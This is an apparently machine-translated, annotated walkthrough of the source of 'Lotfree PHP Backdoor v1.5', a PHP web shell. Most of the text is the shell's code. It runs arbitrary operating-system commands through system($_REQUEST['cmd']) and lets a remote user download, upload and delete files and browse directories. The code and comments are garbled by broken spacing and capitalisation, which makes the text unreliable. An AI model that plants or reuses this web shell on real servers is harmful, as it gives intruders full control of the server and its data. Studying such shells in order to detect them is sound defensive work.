Explaining PHP Backdoor files

PHP Backdoor Version 1.5 is a PHP backdoor program written by Sirius_black/lotfree team, here for a brief analysis of it, but also as a self-learning PHP notes, the backdoor into the execution of the command, Depending on the user's permissions when installing the Web server and PHP, you can execute various operating system commands if you are an administrator. The following is a note for a backdoor program function Good_link ($link) { $link =ereg_replace ("/+", "/", $link); $link =ereg_replace ("/[^/(..)") +/\.\. ","/", $link); $link =ereg_replace ("/+", "/", $link); if (!strncmp ($link, "./", 2) && strlen ($link) >2) $link =substr ($link, 2); if ($link = = "") $link = "."; return $link; } $_request used to obtain the data submitted to this document $dir =isset ($_request[' dir '])? $_request[' dir ']: "."; If Dir,dir is not defined, the default value "." $dir =good_link ($dir); $rep =opendir ($dir); Open DIR-Specified path handle ChDir ($dir); Switch to DIR-specified directory if (Isset ($_request["]) &&$_request[" Down "]!=" ")//if the down is defined { Header ("Content-type:application/octet-stream"); Header ("Content-length:". FileSize ($_request["Down")); Header ("content-disposition:attachment; Filename= ". BaseName ($_request[" Down ")); ReadFile ($_request["Down"]); To read a file to a buffer Exit (); } ?> Lotfree PHP Backdoor v1.5, easy to trace network yeetrack.com echo "The current absolute path is: ". GETCWD (). " \ n "; Gets the current absolute path echo "dir = ' $dir ' \ n "; echo "Current directory, file list! \ n "; If you have entered a command to execute if (isset ($_request[' cmd ')) &&$_request[' cmd ']!= "") { echo " \ n "; System ($_request[' cmd '); Executes the input command on the server, performs a result echo echo " \ n "; } If you have already uploaded the file if (Isset ($_files["fic" ["Name"]) && isset ($_post["max_file_size"))//Get POST file, save to current directory { if ($_files["fic" ["Size"]<$_post["max_file_size"])//Determine if the file conforms to the size specification { if (Move_uploaded_file ($_files["fic"] ["Tmp_name"],good_link ("./". $_files["fic" ["Name"])))//Save temporary files to the current directory { echo "File saved successfully". Good_link ("./". $_files["fic" ["Name"]). "! \ n "; } else echo "File upload failed:". $_files["FIC" ["Error"]. " \ n "; } else echo "File too large (files exceeding size limit)! \ n "; } if (Isset ($_request[' rm ')) &&$_request[' rm ']!= "")//if RM is defined, the specified file is deleted { if (unlink ($_request[' rm '))//unlink is a php delete file function echo "successfully deleted". $_request[' RM ']. "! \ n "; else echo "Delete file failed \ n "; } ?> $t _dir=array (); $t _file=array (); $i _dir=0; $i _file=0; The directory file before the loop is read, placed in T_dir and T_file while ($x =readdir ($rep)) { if (Is_dir ($x))//If the directory is currently being processed $t _dir[$i _dir++]= $x; else//If the file is currently being processed $t _file[$i _file++]= $x; } Closedir ($REP); Close a directory handle opened by Opendir while (1)//loop to enter the directory and file for the current path { ?> $_server[' php_self ' gets the current PHP script file name if ($y =each ($t _file)) { if ($y ["Key"]%2==0)//If key is currently being processed echo "bgcolor= ' LightGreen ' >\n"; else//If value is currently being processed, that is, the file. The file is displayed and a download link is provided. echo ">\n"; echo "". $y ["Value"]. " \ n "; } else echo ">\n"; ?> if ($y) { If this is a file, provide the following link to delete the file if ($y ["Key"]%2==0) echo "bgcolor= ' LightGreen '"; echo ">Del"; } else echo ">\n"; ?> if (! $x &&! $y) Break } ?> if ($x =each ($t _dir)) { $name = $x ["Value"]; Gets the directory name in the T_dir array if ($name = = '. ') {} ElseIf ($name = = ' ... ') echo "Up (parent directory) \ n "; Show an up link to read the list of files in the parent directory Else echo "". $name. " \ n "; } ?> ? dir= ">revenirau repertoire d ' Origine Upload file to server current directory: Copy Code

